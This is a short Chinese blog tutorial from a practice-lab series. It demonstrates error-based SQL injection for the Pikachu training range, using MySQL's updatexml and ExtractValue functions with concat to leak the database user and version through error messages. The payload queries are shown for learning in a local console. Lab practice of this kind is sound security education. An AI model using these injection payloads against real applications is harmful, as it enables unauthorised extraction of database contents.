Pikachu靶场报错SQL注入

作者：繁依Fanyi0 | 2024-03-19 10:23:42

踩

Pikachu靶场报错SQL注入

updatexml函数 用法

select updatexml('<h1>hello</h1>' , '/h1' ,'x');

在 MySQL 的 bin 路径下打开 cmd ，输入下面的命令，再输入 数据库的密码

mysql -u root -p

使用报错注入

select updatexml('hello' , (select user()),'x');

select updatexml('hello' , (select version()),'x');

发现不全，借助 concat函数

select concat('hello' , 'world');

select updatexml('hello' , concat('<<' , (select version()) , '>>') , 'x');

或使用 ExtractValue函数

SELECT ExtractValue('<a><b>hello</b></a>' , '/a/b');

SELECT ExtractValue('<a><b>hello</b></a>' , concat('<<',(SELECT @@version),'>>'));

声明：本文内容由网友自发贡献，不代表【wpsshop博客】立场，版权归原作者所有，本站不承担相应法律责任。如您发现有侵权的内容，请联系我们。转载请注明出处：https://www.wpsshop.cn/w/繁依Fanyi0/article/detail/267536?site

Pikachu靶场 报错SQL注入